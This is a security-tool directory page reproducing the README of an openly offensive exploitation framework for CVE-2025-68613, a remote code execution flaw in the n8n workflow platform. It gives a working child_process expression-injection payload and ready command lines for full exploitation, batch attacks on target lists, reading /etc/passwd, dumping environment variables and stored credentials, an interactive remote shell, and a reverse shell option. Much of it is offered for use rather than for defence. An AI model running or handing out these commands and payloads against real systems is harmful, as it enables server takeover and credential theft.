Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Workflow Automation Remote Code Execution | Kitploit
Tools/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingCommand and ControlLearning & EducationRed Teaming
Remote Access Tool
Payload Development
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Workflow Automation Remote Code Execution

View Repository
53149 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

n8n God Mode Ultimate - CVE-2025-68613 Scanner & Exploitation Framework

n8n God Mode Ultimate

Advanced n8n Workflow Automation RCE Scanner & Exploitation Tool

Python Version License CVE CVSS Score


🎯 Overview

n8n God Mode Ultimate is a comprehensive security testing framework designed to detect and validate CVE-2025-68613 in n8n workflow automation platforms. This critical Remote Code Execution (RCE) vulnerability affects n8n versions through expression injection in workflow execution contexts.

CVE-2025-68613 Details

  • CVSS Score: 10.0 (Critical)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low (valid credentials)
  • User Interaction: None
  • Vulnerability Type: Expression Injection → Remote Code Execution

Affected Versions:

  • n8n >= 0.211.0 and < 1.120.4
  • n8n >= 1.121.0 and < 1.121.1

Patched Versions:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Features

🔍 Detection & Scanning

  • Intelligent Version Detection - Extract n8n version from signin page metadata
  • Batch Scanning - Multi-threaded concurrent target scanning with progress tracking
  • Multiple Scan Modes:
    • --detect - Version detection only (fastest, non-intrusive)
    • --safe - Safe vulnerability check without exploitation
    • --poc - RCE proof-of-concept validation
    • --exploit - Full exploitation mode

💣 Exploitation Capabilities

  • 4 Exploitation Techniques:
    1. Schedule Trigger - Auto-executing workflow (most reliable)
    2. Webhook Trigger - HTTP-triggered execution
    3. Code Node - Direct child_process access
    4. Expression Injection - Manual expression execution

🎮 God Mode Features

  • Interactive Shell - Full remote shell with command history
  • File Operations:
    • read <file> - Read remote files
    • write <file> <content> - Write files to target
  • Environment Extraction - Dump all environment variables
  • System Information - OS details, network config, process info
  • Reverse Shell - Optional reverse shell payload generation
  • Command History - Built-in history tracking

📊 Advanced Capabilities

  • Credential Enumeration - Extract stored credentials via API
  • Workflow Dumping - Export all workflows with metadata
  • Configuration Extraction - Full system config dump
  • User Enumeration - List all n8n users
  • Execution Log Analysis - Parse command outputs from workflow executions
  • Automated Cleanup - Optional workflow deletion after execution

🚀 Installation

Prerequisites

# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

Install Dependencies

# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

Requirements

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Usage

Basic Usage

# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

God Mode Operations

# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Batch Scanning

# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

targets.txt format:

http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Interactive Shell Commands

Once in shell mode (--shell):

n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ Command Line Options

Target Options

-u, --url URL             Target n8n URL
-l, --list FILE           File containing target URLs
-t, --threads NUM         Number of threads for batch scanning (default: 10)

Authentication

-e, --email EMAIL         n8n user email
-p, --password PASS       n8n user password

Scan Modes

--detect                  Version detection only (fastest)
--safe                    Safe check without exploitation
--poc                     RCE proof-of-concept
--exploit                 Full exploitation mode

God Mode

--god                     Enable god mode
--cmd COMMAND             Execute single command
--read-file PATH          Read remote file
--write-file PATH         Write remote file
--content DATA            Content for write operation
--dump-env                Extract all environment variables
--shell                   Interactive shell mode
--revshell HOST:PORT      Reverse shell payload

Exploitation Options

--mode MODE               Exploit mode: schedule|webhook|code|expression (default: schedule)
--timeout SEC             Command timeout in seconds (default: 30)
--cleanup                 Delete workflows after execution
-k, --insecure           Disable SSL verification
-v, --verbose            Verbose output
-q, --quiet              Minimal output

🔬 Technical Details

Exploitation Methodology

1. Schedule Trigger (Recommended)

Creates a workflow with a scheduled trigger that auto-executes every 3 seconds. Most reliable method.

Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Webhook Trigger

Creates an HTTP webhook endpoint that executes commands when triggered.

3. Code Node

Injects code directly into a Code node with child_process access.

4. Expression Injection

Manual execution via n8n's expression evaluation system.

Version Detection

Extracts version from base64-encoded Sentry configuration in signin page:

<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />
Download Tool